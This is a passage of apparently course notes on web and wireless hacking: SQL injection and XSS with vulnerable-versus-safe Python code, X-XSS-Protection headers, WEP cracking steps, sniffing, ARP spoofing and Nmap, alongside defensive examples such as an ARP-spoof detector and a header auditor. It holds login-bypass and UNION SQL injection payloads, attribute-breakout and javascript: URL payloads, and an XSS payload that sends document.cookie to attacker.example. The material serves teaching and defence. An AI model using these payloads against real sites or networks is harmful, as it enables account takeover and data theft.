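    sql = f"SELECT username FROM users WHERE username = '{username}' AND pw_hash = '{pw_hash}'"
    row = db.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(db, username, password):
    """Bound parameters: the driver hands the input to SQLite as data, so it can
    never be parsed as SQL, whatever characters it contains."""
    pw_hash = hashlib.sha256(password.encode()).hexdigest()
    row = db.execute("SELECT username FROM users WHERE username = ? AND pw_hash = ?",
                     (username, pw_hash)).fetchone()
    return row[0] if row else None


def search_vulnerable(db, term):
    """A search box built by concatenation: UNION lets the attacker read columns
    from any table, here the password hashes."""
    sql = f"SELECT username FROM users WHERE username LIKE '%{term}%'"
    return [r[0] for r in db.execute(sql).fetchall()]


def search_safe(db, term):
    return [r[0] for r in db.execute("SELECT username FROM users WHERE username LIKE ?",
                                     (f"%{term}%",)).fetchall()]


# Constructed payloads: "--" starts an SQL comment, so the password check is dropped.
LOGIN_PAYLOAD = "admin' -- "
UNION_PAYLOAD = "' UNION SELECT pw_hash FROM users -- "


def run_demo():
    db = make_db()
    return {
        "vuln_bypass": login_vulnerable(db, LOGIN_PAYLOAD, "anything"),  # 'admin' without the password
        "safe_bypass": login_safe(db, LOGIN_PAYLOAD, "anything"),        # None: no such user
        "safe_legit": login_safe(db, "alice", "correct horse"),
        "union_dump": search_vulnerable(db, UNION_PAYLOAD),              # usernames plus both hashes
        "safe_search": search_safe(db, UNION_PAYLOAD),                   # nothing matches that literal
    }


if __name__ == "__main__":
    for k, v in run_demo().items():
        print(f"{k:12s} {v}")
```

Note that the parameterized version does not need to know which characters are dangerous:
the input is still stored and compared verbatim, it simply never reaches the SQL parser.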


Cross-Site Scripting (XSS)

In an SQL injection attack, an attacker goes after a vulnerable website to target its
stored data, such as user credentials or sensitive financial data. But if the attacker
would rather directly target a website's users, they may opt for a cross-site scripting
attack. Similar to an SQL injection attack, this attack also involves injecting
malicious code into a website or web-based app. However, in this case the malicious
code the attacker has injected only runs in the user's browser when they visit the
attacked website, and it goes after the visitor directly.

One of the most common ways an attacker can deploy a cross-site scripting attack
is by injecting malicious code into an input field that would be automatically run
when other visitors view the infected page. For example, they could embed a link to
a malicious JavaScript in a comment on a blog.

Cross-site scripting attacks can significantly damage a web company's reputation by
placing the users' information at risk without any indication that anything malicious
even occurred. Any sensitive information a user sends to the site or the
application, such as their credentials, credit card information, or other private
data, can be hijacked via cross-site scripting without the owners realizing there was
even a problem in the first place.


Cross-site Scripting
Cross-site scripting is also known as XSS. It occurs when JavaScript controlled by an
attacker is executed within a user's browser: the code runs in the browser of the victim,
not on the server. On initial injection the attacker does not control the site itself;
instead, the malicious code is attached to a valid page of the website. Whenever that page
is loaded, the injected script executes, and the browser treats it as legitimate code of
the site.

JavaScript in XSS
JavaScript is a programming language that runs inside the web browser, not on the web
server. It is the client-side code that adds interactivity and functionality to a web
page, and it is used extensively by CMS platforms and by all major web applications.
Unlike a server-side language such as PHP, JavaScript cannot run on the server; what it
can do is make background requests to the server, and an attacker can use such requests
to add malicious content to a web page without refreshing it. These requests perform
actions asynchronously, or gather information about the client's browser, with the
privileges of whoever is logged in. Because injected JavaScript executes under the
website's own origin, it can read that site's cookies and DOM and act on the user's
behalf, which is what makes XSS dangerous to visitors.

Working of Cross-site scripting

Only when the attacker exploits a vulnerability in the website's software can they inject
their code into a page of the victim's website. After successfully exploiting the
vulnerability, the attacker's script is delivered to visitors and executed by their
browsers.

When the victim's browser runs the JavaScript, sensitive information about the target user,
such as the session, can be accessed. Stealing the session of an administrator allows the
attacker to take over the site completely.

A cross-site scripting attack is most effective when publicly accessible pages of the
website are vulnerable. In that case the attacker can inject malicious content, phishing
prompts or ads into the website to target all of its visitors.

Types of Cross-site scripting attacks

There are various ways to use cross-site scripting on the basis of our goals. The most
common type of cross-site scripting attacks is as follows:

Stored Cross-site scripting attack

A stored cross-site scripting attack occurs when the attacker's payload is saved by the
vulnerable server (in a database, a comment, a profile field) and then delivered by the
website to every other visitor who views that content. Only one action by the attacker is
needed, after which many visitors are compromised, which makes stored XSS the most
dangerous variant. An example is a profile field such as the display name or email
address that the server stores and later shows on the account page without encoding it.

Reflected Cross-site scripting attack

A reflected cross-site scripting attack occurs when the payload is carried in the request
itself (a URL parameter or form field) and the server echoes it back in the immediate
response. A search form is the typical example: the search term is sent to the server and
displayed in the results page, so it is seen only by the visitor who submitted it. The
attacker therefore has to deliver the payload to each victim, usually by sending a crafted
link that points at the vulnerable page.

Self Cross-site scripting attack

A self cross-site scripting attack occurs when exploiting the vulnerability requires the
victim to make the change themselves, manually and in a very specific context, for example
by pasting the payload into their own profile field or editing a cookie value. It relies on
social engineering (such as tricking the victim into pasting code into the browser console)
rather than on a flaw the attacker can trigger remotely.

Blind Cross-site scripting attack

A blind cross-site scripting attack occurs when the attacker cannot see the result of the
attack, because the page where the payload is rendered can only be accessed by authorized
users (an admin panel showing support tickets or log entries, for example). It needs more
preparation: the attacker receives no notification if the payload fails, so the payload
usually calls back to a server the attacker controls. Polyglot payloads, which work in
several contexts at once (inside a script tag, as plain text, or inside an attribute), are
used to raise the success rate.

DOM-Based Cross-site scripting attack

A DOM-based cross-site scripting attack occurs when the vulnerability lies in the page's own
JavaScript rather than in the server. Client-side code reads a value from the URL (the
query string or fragment) or another attacker-influenced source and writes it into the
page, modifying the DOM after load; if that value is not sanitized, the malicious code is
added to the page without the server ever seeing it. A site that reads the language from
the URL and switches the page to that language instead of the default is an example of
where this occurs.

Prevention of Cross-site scripting attacks

Website vulnerabilities can be exploited using a variety of methods, and there is no
single strategy that removes the risk of cross-site scripting. Cross-site scripting is
enabled by unsafe user input being rendered directly into the web page. The attack becomes
impossible if user input is properly encoded for the context it is inserted into (HTML
body, attribute, URL or script) before rendering, so that it cannot escape that context.
Using the following protective measures, we can harden our web applications and protect
our website.

Whitelist Values

We can restrict the input of a user to a specific whitelist, so that only known, safe values
are accepted by the server. This works only where the expected data is known in advance,
such as the choices of a drop-down menu.

Restrict HTML in Inputs

Accepting raw HTML should be limited to trusted users. If we want to allow formatting and
styling in an input, we can use Markdown instead of HTML to generate the content. If we
must accept HTML, we should sanitize it with a robust sanitizer such as DOMPurify, which
removes all unsafe code.


Sanitize value

If we are using content on a page generated by a user, we should ensure that it would
not result in HTML content by using entities in place of unsafe characters. The
appearance of regular characters and entities are the same, but the entity cannot
generate HTML.
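Entity encoding is context dependent, and the one case it does not cover is worth seeing
next to the ones it does. The script below is an added example, not code from the original
notes or from any web framework: two small render functions stand in for a template, the
vulnerable one dropping profile fields straight into the page and the safe one encoding
for the HTML body and attribute contexts and allow-listing the URL scheme for the link,
since a "javascript:" URL survives entity encoding unchanged. The payloads are
constructed and the scheme allow-list is an assumption.

```python
"""Context-aware output encoding against XSS: vulnerable rendering beside the fix.

Added example for these notes, not code from the original text or from any
framework. The two render functions stand in for a template; the payloads are
constructed, and the allow-list of URL schemes is an assumption.
"""
import html
import urllib.parse

# Constructed payloads for the three contexts user data usually lands in.
SCRIPT_PAYLOAD = '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>'
ATTR_PAYLOAD = '" autofocus onfocus="alert(document.domain)'   # breaks out of a quoted attribute
URL_PAYLOAD = "javascript:alert(document.domain)"              # survives HTML escaping unchanged


def render_vulnerable(name, comment, website):
    """Stored XSS: profile fields dropped straight into the page."""
    return f'<p title="{name}">{comment}</p><a href="{website}">site</a>'


def safe_url(url):
    """URL context: entity escaping does not neutralise javascript: links, so
    allow only http and https and replace anything else."""
    scheme = urllib.parse.urlsplit(url.strip()).scheme.lower()
    return url if scheme in ("http", "https") else "#"


def render_safe(name, comment, website):
    """HTML body: escape & < >; attribute: also escape quotes (html.escape does
    both with quote=True, its default); href: allow-list the scheme first."""
    return (f'<p title="{html.escape(name)}">{html.escape(comment)}</p>'
            f'<a href="{html.escape(safe_url(website))}">site</a>')


def demo():
    """Render the same malicious profile both ways and return the markup."""
    return {
        "vulnerable": render_vulnerable(ATTR_PAYLOAD, SCRIPT_PAYLOAD, URL_PAYLOAD),
        "safe": render_safe(ATTR_PAYLOAD, SCRIPT_PAYLOAD, URL_PAYLOAD),
    }


if __name__ == "__main__":
    for label, page in demo().items():
        print(label, "->", page)
```

In the safe output the script tag is displayed as text, the attribute payload stays inside
the title attribute as &quot;-escaped characters, and the javascript: link is replaced.
Inserting user data into a script block or an event handler needs a different encoding
again, which is why frameworks apply encoding per context automatically.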

Use HTTPOnly Flags on Cookies

Session cookies are used to allow a website to recognize a user between requests. An
attacker frequently exfiltrates the user's cookies to steal the admin session: once the
attacker has a user's cookies, they can log in to that account without knowing the
credentials. HttpOnly cookies cannot be read by JavaScript, which prevents the injected
script from reading the session cookie and makes stealing the session harder. This method
only protects the cookies themselves: the attacker's script can still act as the logged-in
user and send requests within the active browser session. It is therefore a useful
mitigation only where cookies are the main identification mechanism, and it does not remove
the XSS vulnerability.

Use WAF

A web application firewall can virtually patch attacks against our website: it intercepts
requests that carry SQLi, RCE or XSS payloads before they reach the application. Large-scale
attacks such as DDoS can also be mitigated by it. A WAF is a compensating control, not a
fix: payloads that evade its signatures still reach a vulnerable application, so the code
itself should be corrected as well.

HTTP headers | X-XSS-Protection



HTTP headers are used to pass additional information with HTTP responses or HTTP
requests. X-XSS-Protection is a response header that tells older browsers to stop a page
from loading when their built-in filter detects a reflected XSS attack. It is non-standard
and deprecated: modern browsers have removed the filter, and a Content-Security-Policy
that disallows inline scripts is the replacement.
XSS attacks: XSS stands for Cross-site Scripting. In this attack the goal is to run
script inside a vulnerable web application under its own origin, bypassing the browser's
same-origin policy. The attack is possible only when HTML is generated dynamically and
the user input is not sanitized. The attacker inserts his own HTML or script into the
webpage, which the browser cannot distinguish from the site's own code, and with it can
read the site's cookies and send requests to the site (including to its database-backed
pages) as the logged-in user. To stop this kind of attack, X-XSS-Protection was used in
earlier days.
Syntax:
X-XSS-Protection: directive
Type of XSS Attack: Cross site scripting attacks are broadly classified into two
categories.
 Server XSS: In this type of attack hacker attaches untrusted data with the HTML
response. In this case, vulnerability is present at the server end and the browser just
runs the script present in the response.
 Client XSS: In this type of XSS attack unsafe javascript is used to update the DOM
data. If we add javascript code in DOM with a javascript call, such a javascript call is
called an unsafe javascript call.
Directives: In this header field there are four directives:
 0: It disables the X-XSS-Protection filter.
 1: It enables the filter; this was the browsers' default behaviour when the header was
absent. If an attack is detected, the browser sanitizes the page (removes the unsafe parts).
 1; mode=block: It enables the filter. If the browser detects an attack, it will not
render the page at all.
 1; report=<reporting-URI>: It enables the filter (Chromium only). If a cross-site
scripting attack is detected, the page is sanitized and a report is sent to the URI
given by the report directive.
Example 1: Block pages from loading when they detect reflected Cross-site Scripting
attacks. The two header values are:

    X-XSS-Protection: 1; mode=block     (enables the protection and blocks the page)
    X-XSS-Protection: 0                 (disables the protection)

Example 2: Setting the header on an Apache server (requires the mod_headers module):

    <IfModule mod_headers.c>
        Header set X-XSS-Protection "1; mode=block"
    </IfModule>

Example 3: Setting the header on an Nginx server:

    add_header "X-XSS-Protection" "1; mode=block";

Supported Browsers: The browsers that implemented the X-XSS-Protection header are listed
below. Chrome removed its XSS Auditor in version 78 (2019) and Chromium-based Edge never
carried it; Firefox never implemented the header at all. Treat it as a legacy setting and
rely on Content-Security-Policy instead.
 Google Chrome (up to version 77)
 Internet Explorer
 Safari
 Opera
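The checks above are easy to apply mechanically. The following Python script is an added example, not code from these notes or from any browser vendor: it parses the four documented header forms and audits a response's headers the way a tester would, flagging a missing or script-permissive Content-Security-Policy, flagging X-XSS-Protection: 1 without mode=block, and reporting the header as deprecated when a site relies on it. The header dictionaries are constructed samples and the finding codes (NO_CSP, XSSP_FILTER_MODE and so on) are this example's own names.

```python
"""Audit a set of HTTP response headers for XSS-related controls.

Added example for this unit, not code from the original notes. Header names and
policy values used as input are constructed for illustration; the finding codes
(NO_CSP, XSSP_FILTER_MODE, ...) are this example's own names.
"""


def parse_xss_protection(value: str):
    """Parse an X-XSS-Protection value into (enabled, mode, report_uri).

    Accepts the four documented forms: "0", "1", "1; mode=block" and
    "1; report=<uri>". Anything else raises ValueError so that a typo in a
    security header does not pass silently as "enabled".
    """
    parts = [p.strip() for p in value.split(";") if p.strip()]
    if not parts or parts[0] not in ("0", "1"):
        raise ValueError(f"malformed X-XSS-Protection value: {value!r}")
    enabled = parts[0] == "1"
    mode = report = None
    for part in parts[1:]:
        name, _, arg = part.partition("=")
        name, arg = name.strip().lower(), arg.strip()
        if name == "mode" and arg.lower() == "block":
            mode = "block"
        elif name == "report" and arg:
            report = arg
        else:
            raise ValueError(f"unknown X-XSS-Protection directive: {part!r}")
    if not enabled and (mode or report):
        raise ValueError("directives are meaningless with X-XSS-Protection: 0")
    return enabled, mode, report


def csp_directive_names(policy: str):
    """Return the set of directive names present in a Content-Security-Policy."""
    return {d.strip().split()[0].lower() for d in policy.split(";") if d.strip()}


def audit_headers(headers: dict):
    """Return a list of (code, message) findings for one HTTP response.

    Header names are matched case-insensitively, as HTTP requires.
    """
    lower = {name.lower(): value for name, value in headers.items()}
    findings = []

    csp = lower.get("content-security-policy")
    if csp is None:
        findings.append(("NO_CSP", "no Content-Security-Policy header; CSP is the "
                         "supported browser-side control against XSS"))
    elif not csp_directive_names(csp) & {"script-src", "default-src"}:
        findings.append(("CSP_NO_SCRIPT_SRC", "CSP sets neither script-src nor "
                         "default-src, so script sources are unrestricted"))

    xss = lower.get("x-xss-protection")
    if xss is not None:
        try:
            enabled, mode, _report = parse_xss_protection(xss)
        except ValueError as exc:
            findings.append(("XSSP_MALFORMED", str(exc)))
        else:
            if enabled:
                findings.append(("XSSP_DEPRECATED", "X-XSS-Protection is deprecated; "
                                 "current Chromium and Firefox ignore it, so it must "
                                 "not be the only XSS control"))
                if mode != "block":
                    findings.append(("XSSP_FILTER_MODE", "X-XSS-Protection: 1 without "
                                     "mode=block sanitises instead of blocking; the "
                                     "sanitiser has been abused to strip legitimate "
                                     "scripts, so use mode=block or 0"))
    return findings


if __name__ == "__main__":
    # Constructed sample responses: a legacy server and a hardened one.
    legacy = {"Server": "Apache", "X-XSS-Protection": "1"}
    hardened = {"Content-Security-Policy": "default-src 'self'; script-src 'self'",
                "X-XSS-Protection": "0"}
    for label, hdrs in (("legacy", legacy), ("hardened", hardened)):
        print(label, audit_headers(hdrs) or "no findings")
```

Feed it the headers returned by a real request (for example the dictionary from a requests or urllib response) and the findings list is empty only when a CSP restricts script sources and X-XSS-Protection is absent or set to 0.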

UNIT-V
Hacking wireless network
Introduction

Sales of wireless LANs to home users and small businesses will soar this
year, with products using IEEE 802.11 (Wi-Fi) technology leading the way,
according to a report by Cahners research. Worldwide, consumers will buy
7.3 million wireless LAN nodes--which include client and network hub
devices--up from about 4 million last year. This third book in the
"HACKING" series from Syngress is written by the SoCalFreeNet Wireless
Users Group and will cover 802.11a/b/g (“Wi-Fi”) projects teaching these
millions of Wi-Fi users how to "mod" and "hack" Wi-Fi access points,
network cards, and antennas to run various Linux distributions and create
robust Wi-Fi networks.
Cahners predicts that wireless LANs next year will gain on Ethernet as the
most popular home network technology. Consumers will hook up 10.9
million Ethernet nodes and 7.3 million wireless out of a total of 14.4
million home LAN nodes shipped. This book will show Wi-Fi enthusiasts
and consumers of Wi-Fi LANs who want to modify their Wi-Fi hardware
how to build and deploy “homebrew” Wi-Fi networks, both large and
small.

ROLE OF WEP:

Since wireless networks transmit data through radio waves, anyone within range can receive
the frames, so data is easily intercepted unless it is encrypted. Introduced in 1997 as part
of the original IEEE 802.11 standard, Wired Equivalent Privacy (WEP) was the first attempt
at wireless protection. Its aim was to give a wireless link confidentiality comparable to a
wired one by encrypting each frame with the RC4 stream cipher: an interceptor sees only
ciphertext, while devices that hold the shared key can decrypt the traffic, because every
device on the network uses the same algorithm and the same key.

WEP keys are quoted as 64- or 128-bit, but only 40 or 104 of those bits are the secret key
that is entered (usually in hexadecimal); the remaining 24 bits are a per-frame
initialisation vector (IV) sent in the clear in front of each frame. The key is static:
every device encrypts all of its traffic with the single shared key, and that key is what a
client must know to join a WEP-protected network.

WEP's goal was to keep eavesdroppers out, and for a few years it did. The design, however,
is flawed in ways that no increase in key size fixes: the 24-bit IV space is exhausted
quickly on a busy network, so keystreams repeat; RC4 with the IV prepended to the key leaks
key bytes through statistically weak first keystream bytes; and the CRC-32 integrity check
is linear, so encrypted frames can be modified undetected. Practical key-recovery attacks
were published from 2001 onward and became faster as computing power and tools improved.
The IEEE deprecated WEP in 2004 with the ratification of 802.11i, and the Wi-Fi Alliance
officially retired it the same year. Today WEP security is considered obsolete, although it
is still sometimes found in use, either because network administrators never changed the
default security on their wireless routers or because old devices cannot support newer
encryption methods such as WPA.

CRACKING WEP KEYS:

In order to crack WEP we first need to capture a large number of encrypted frames, because
each frame carries a fresh IV and the attack works on those IVs. Once enough have been
captured, a tool called aircrack-ng runs statistical attacks (the PTW attack is its default)
on the collected IVs to recover the WEP key. The more IVs we have, the higher the chance of
breaking the key: in practice tens of thousands of IVs are needed for a 104-bit key, and on
a quiet network the attacker generates them by capturing an ARP request and replaying it
with aireplay-ng, since every replay produces a new encrypted frame.

Let's look at the most basic case of cracking a WEP key. First we put the Wi-Fi card into
monitor mode (airmon-ng start wlan0, which on current releases creates a monitor interface
such as wlan0mon). Then we run airodump-ng on that interface to see all of the networks
within our Wi-Fi range, with their BSSID, channel and encryption type, and select a WEP
network as the target. Here wlan0 is the name of the wireless interface.

SNIFFING TRAFFIC, WIRELESS DOS ATTACKS:

A sniffing attack can also be used to recover credentials. On a wireless network this most
often means capturing a WPA/WPA2-PSK four-way handshake and cracking the passphrase offline
with a dictionary, or capturing protocols that carry passwords in the clear (Telnet, FTP,
HTTP basic authentication, POP3). Traffic inside an encrypted channel such as SSH or TLS
yields only ciphertext to the sniffer; a password typed into an SSH session cannot be
recovered from the capture.

 "Sniffing" is the act of capturing traffic on a network, usually for the purpose of
espionage or sabotage (or, legitimately, for troubleshooting and intrusion detection).
 Any traffic that reaches the attacker's network interface can be sniffed: on a hub, on an
open or WEP-protected wireless network, on a switch port mirrored to the attacker (SPAN),
or on a switched segment after an ARP spoofing attack has redirected the traffic. Sniffing
is performed with programs such as tcpdump, tcpflow or Wireshark, either on the host
itself or on a dedicated monitoring port.
 ARP spoofing (ARP cache poisoning) involves sending forged Address Resolution Protocol
(ARP) replies on the local Ethernet segment. The forged replies bind the victim's IP
address (often the default gateway's) to the attacker's MAC address, so that hosts on the
segment send traffic meant for the victim through the attacker-controlled host, which can
read or modify it before forwarding.
 This is used both to hijack sessions and to cause denial of service: if the attacker does
not forward the traffic, or binds the gateway's address to a non-existent MAC address, the
victims lose connectivity.
 Wireless networks have a denial-of-service problem of their own: 802.11 management frames
such as deauthentication and disassociation were unauthenticated in the original standard,
so an attacker who spoofs the AP's address can knock clients off the network at will. The
same trick is used to force a client to reconnect so that its WPA handshake can be
captured. Protected Management Frames (802.11w) address this where both AP and client
support them.
 Every IP packet consists of an IP header followed by its payload (for example a TCP
segment); on a LAN the packet is carried inside an Ethernet frame, which adds its own
header in front of it. The combination is what people who work with network traffic
loosely call a "packet". The Ethernet header holds the destination MAC address (the
hardware address of the recipient machine), the source MAC address and a 16-bit EtherType
that identifies the encapsulated protocol: 0x0800 for IPv4, 0x0806 for ARP, 0x86DD for
IPv6. A sniffer reads the EtherType to decide how to decode the rest of the frame, and an
attacker in the path can inspect and rewrite the headers without caring about the payload.
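The ARP spoofing attack and the frame layout described above can be demonstrated without a network. The Python below is an added example, not code from these notes: it builds Ethernet/ARP frames with struct, decodes them by EtherType, and runs a small ARP watch over a constructed sequence in which an attacker's reply re-binds the gateway's IP address. The MAC and IP addresses are invented lab values; in a real deployment the frames would come from a raw socket or a pcap file rather than being built in memory.

```python
"""Decode Ethernet/ARP frames and flag ARP spoofing.

Added example for this section, not code from the notes. The frames are
constructed in memory (no capture needed); MAC and IP addresses are invented
lab values. A real deployment would feed frames from a raw socket or pcap.
"""
import struct

ETH_HDR = struct.Struct("!6s6sH")          # dst MAC, src MAC, EtherType
ARP_HDR = struct.Struct("!HHBBH6s4s6s4s")  # htype, ptype, hlen, plen, op, sha, spa, tha, tpa
ETHERTYPE_IPV4 = 0x0800
ETHERTYPE_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2


def mac_bytes(text: str) -> bytes:
    return bytes.fromhex(text.replace(":", ""))


def ip_bytes(text: str) -> bytes:
    return bytes(int(octet) for octet in text.split("."))


def mac_text(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def ip_text(raw: bytes) -> str:
    return ".".join(str(b) for b in raw)


def build_arp_reply(sender_mac, sender_ip, target_mac, target_ip) -> bytes:
    """Build an Ethernet frame carrying the ARP reply 'sender_ip is at sender_mac'."""
    arp = ARP_HDR.pack(1, ETHERTYPE_IPV4, 6, 4, ARP_REPLY,
                       mac_bytes(sender_mac), ip_bytes(sender_ip),
                       mac_bytes(target_mac), ip_bytes(target_ip))
    return ETH_HDR.pack(mac_bytes(target_mac), mac_bytes(sender_mac), ETHERTYPE_ARP) + arp


def parse_frame(frame: bytes) -> dict:
    """Decode the Ethernet header; decode the ARP body too when the EtherType says ARP."""
    if len(frame) < ETH_HDR.size:
        raise ValueError("truncated Ethernet header")
    dst, src, ethertype = ETH_HDR.unpack_from(frame, 0)
    info = {"dst": mac_text(dst), "src": mac_text(src), "ethertype": ethertype}
    if ethertype != ETHERTYPE_ARP or len(frame) < ETH_HDR.size + ARP_HDR.size:
        return info
    htype, ptype, hlen, plen, op, sha, spa, tha, tpa = ARP_HDR.unpack_from(frame, ETH_HDR.size)
    if (htype, ptype, hlen, plen) != (1, ETHERTYPE_IPV4, 6, 4):
        return info  # not Ethernet/IPv4 ARP; leave the body undecoded
    info.update(op=op, sender_mac=mac_text(sha), sender_ip=ip_text(spa),
                target_mac=mac_text(tha), target_ip=ip_text(tpa))
    return info


class ArpWatch:
    """Remember the first MAC seen for each IP and report any later change."""

    def __init__(self):
        self.table = {}  # ip -> mac learned from the first reply

    def observe(self, frame: bytes):
        info = parse_frame(frame)
        if info.get("op") != ARP_REPLY:
            return None
        ip, claimed = info["sender_ip"], info["sender_mac"]
        alerts = []
        if claimed != info["src"]:  # ARP body and Ethernet header disagree
            alerts.append(f"ARP sender {claimed} differs from frame source {info['src']}")
        known = self.table.setdefault(ip, claimed)
        if known != claimed:
            alerts.append(f"ARP spoof suspected: {ip} was {known}, now claimed by {claimed}")
        return alerts or None


def demo_alerts():
    """Replay a constructed sequence: two genuine replies, then a poisoned one."""
    gateway, victim, attacker = "aa:aa:aa:aa:aa:01", "bb:bb:bb:bb:bb:02", "cc:cc:cc:cc:cc:03"
    frames = [
        build_arp_reply(gateway, "192.168.1.1", victim, "192.168.1.20"),   # genuine
        build_arp_reply(victim, "192.168.1.20", gateway, "192.168.1.1"),   # genuine
        build_arp_reply(attacker, "192.168.1.1", victim, "192.168.1.20"),  # poison
    ]
    watch = ArpWatch()
    return [alert for f in frames for alert in (watch.observe(f) or [])]


if __name__ == "__main__":
    for line in demo_alerts():
        print(line)
```

The first-seen binding is a deliberate simplification: a production tool such as arpwatch also tracks legitimate changes over time, but the core test, an IP address suddenly claimed by a different MAC, is exactly what the poisoned reply trips.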
WLAN SCANNERS:

The purpose of a Wi-Fi scanner is to discover all nearby Wi-Fi networks and collect as much
information about them as possible: network name (SSID), BSSID, channel, security setting
(open, WEP or WPA), signal strength, noise level and interference. For a security assessment
the security setting and the BSSID matter most, since they decide which of the attacks in
this unit apply and which access point a capture should be filtered on.

WLAN SNIFFERS:

When data is transmitted over a computer network it is broken into smaller units at the
sender's node, called data packets, and reassembled at the receiver's node in the original
format. The packet is the unit of communication on a computer network; depending on the
layer it is also called a frame, a segment, a datagram or a cell. The act of capturing data
packets as they cross the network is called packet sniffing; it is the network equivalent
of tapping a telephone line. Attackers use it to collect information about a network and
its users, but it is also used legitimately by administrators, and at scale by ISPs,
advertisers and governments. Anything that is not encrypted end to end can be read by
whoever captures it, including:
 who the receiver of your email is
 what the content of that email is
 what you download
 sites you visit
 what you looked at on that website
 downloads from a site
 streaming events like video, audio, etc.
Advertising agencies or internet advertising agencies are paid according to:
 the number of ads shown by them.
 the number of clicks on their ads, also called PPC (pay per click).
To inflate these figures, some network operators and agencies have sniffed and rewritten
unencrypted HTTP traffic to inject advertisements into pages in transit; injected content
of this kind can also carry malware.
Government agencies use packet sniffing to:
 monitor the security of data crossing the network.
 inspect an organisation's unencrypted traffic.
Packet Sniffer – Packet sniffing is done using tools called packet sniffers. Capture can be
either filtered or unfiltered: filtered when only specific packets are to be captured (for
example one BSSID and channel, so that the capture stays small and the IVs belong to one
network), unfiltered when everything on the medium is captured. Wireshark, tcpdump and
SmartSniff are examples of packet-sniffing tools.
How to prevent packet sniffing –
 encrypting the data you send or receive (TLS for web and mail, SSH, a VPN on untrusted
networks), so that a capture yields only ciphertext;
 using Wi-Fi networks that encrypt the air link (WPA) rather than open networks, and never
relying on WEP for this;
 monitoring your own network for signs of a sniffer, such as unexpected ARP changes or
interfaces in promiscuous mode.
Advantages:
 Network troubleshooting: Packet sniffing can be used to identify network
problems by examining the packets and identifying issues such as network
congestion, packet loss, or improper configuration.
 Security analysis: Packet sniffing can be used to detect and analyze
security threats, such as network intrusions, malware infections, or
unauthorized access attempts.
 Network optimization: Packet sniffing can be used to optimize network
performance by identifying bottlenecks and optimizing the network
configuration.
 Protocol analysis: Packet sniffing can be used to analyze network protocols
and identify areas where they can be improved or optimized.

Disadvantages:
 Privacy violations: Packet sniffing can be used to intercept sensitive
information, such as passwords, credit card numbers, or personal
information, which can be used for malicious purposes.
 Legal issues: in many jurisdictions, capturing traffic you are not authorised to see is
an offence under wiretapping or computer misuse laws; a penetration tester needs written
authorisation that covers the networks to be sniffed.
 Resource usage: Packet sniffing can consume a significant amount of
system resources, especially if large amounts of network traffic are being
analyzed.
 Complexity: Packet sniffing can be a complex process, requiring specialized
knowledge and tools to analyze network traffic effectively.

HACKING TOOLS:

NMAP
Nmap stands for Network Mapper. It is an open source tool that is used widely for
network discovery and security auditing. Nmap was originally designed to scan
large networks, but it can work equally well for single hosts. Network
administrators also find it useful for tasks such as network inventory, managing
service upgrade schedules, and monitoring host or service uptime.

Nmap uses raw IP packets to determine −
 what hosts are available on the network,
 what services those hosts are offering,
 what operating systems they are running on,
 what type of packet filters or firewalls are in use, and other such characteristics.

Nmap runs on all major computer operating systems such as Windows, Mac OS X,
and Linux.
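Nmap's XML output (nmap -oX) is the form other tools consume. The Python below is an added example, not part of Nmap or its documentation: it parses a constructed sample in that layout to extract the facts listed above (hosts that are up, open services with their banners, the OS guess, and ports in the filtered state that point to a packet filter) and flags open services that carry credentials in the clear. The sample XML, the addresses in it and the CLEARTEXT_SERVICES list are this example's own choices.

```python
"""Parse Nmap XML output (nmap -oX) and pull out the facts Nmap establishes.

Added example for these notes, not part of Nmap itself. The XML below is a
constructed sample in the real nmap -oX layout; host addresses, service
banners and the CLEARTEXT_SERVICES list are this example's own choices.
"""
import xml.etree.ElementTree as ET

# Services that carry credentials unencrypted; an open instance is a finding.
CLEARTEXT_SERVICES = {"telnet", "ftp", "pop3", "imap", "http"}

SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sV -O -oX - 10.0.0.0/30" version="7.94">
  <host>
    <status state="up" reason="arp-response"/>
    <address addr="10.0.0.1" addrtype="ipv4"/>
    <address addr="00:11:22:33:44:55" addrtype="mac"/>
    <hostnames><hostname name="gw.lab" type="PTR"/></hostnames>
    <ports>
      <port protocol="tcp" portid="22"><state state="open" reason="syn-ack"/>
        <service name="ssh" product="OpenSSH" version="7.4"/></port>
      <port protocol="tcp" portid="23"><state state="open" reason="syn-ack"/>
        <service name="telnet"/></port>
      <port protocol="tcp" portid="443"><state state="filtered" reason="no-response"/></port>
    </ports>
    <os><osmatch name="Linux 3.2 - 4.9" accuracy="95"/></os>
  </host>
  <host>
    <status state="down" reason="no-response"/>
    <address addr="10.0.0.2" addrtype="ipv4"/>
  </host>
</nmaprun>
"""


def parse_nmap_xml(xml_text: str):
    """Return a list of dicts, one per host that was up, with its open and filtered ports."""
    # For XML produced by an untrusted party use the defusedxml package instead.
    root = ET.fromstring(xml_text)
    hosts = []
    for host in root.iter("host"):
        status = host.find("status")
        if status is None or status.get("state") != "up":
            continue
        addrs = {a.get("addrtype"): a.get("addr") for a in host.findall("address")}
        names = [h.get("name") for h in host.iter("hostname")]
        open_ports, filtered = [], []
        for port in host.iter("port"):
            state = port.find("state")
            number = int(port.get("portid"))
            if state is not None and state.get("state") == "filtered":
                filtered.append(number)       # a packet filter is dropping probes
            if state is None or state.get("state") != "open":
                continue
            svc = port.find("service")
            open_ports.append({
                "proto": port.get("protocol"),
                "port": number,
                "service": svc.get("name") if svc is not None else None,
                "product": svc.get("product") if svc is not None else None,
                "version": svc.get("version") if svc is not None else None,
            })
        osmatch = host.find("os/osmatch")
        hosts.append({
            "ip": addrs.get("ipv4") or addrs.get("ipv6"),
            "mac": addrs.get("mac"),
            "hostnames": names,
            "os": osmatch.get("name") if osmatch is not None else None,
            "os_accuracy": int(osmatch.get("accuracy")) if osmatch is not None else None,
            "open_ports": open_ports,
            "filtered_ports": filtered,
        })
    return hosts


def cleartext_findings(hosts):
    """Return (ip, port, service) for every open service in CLEARTEXT_SERVICES."""
    return [(h["ip"], p["port"], p["service"])
            for h in hosts for p in h["open_ports"]
            if p["service"] in CLEARTEXT_SERVICES]


if __name__ == "__main__":
    found = parse_nmap_xml(SAMPLE_NMAP_XML)
    for h in found:
        print(h["ip"], h["os"], [(p["port"], p["service"]) for p in h["open_ports"]],
              "filtered:", h["filtered_ports"])
    print("cleartext services:", cleartext_findings(found))
```

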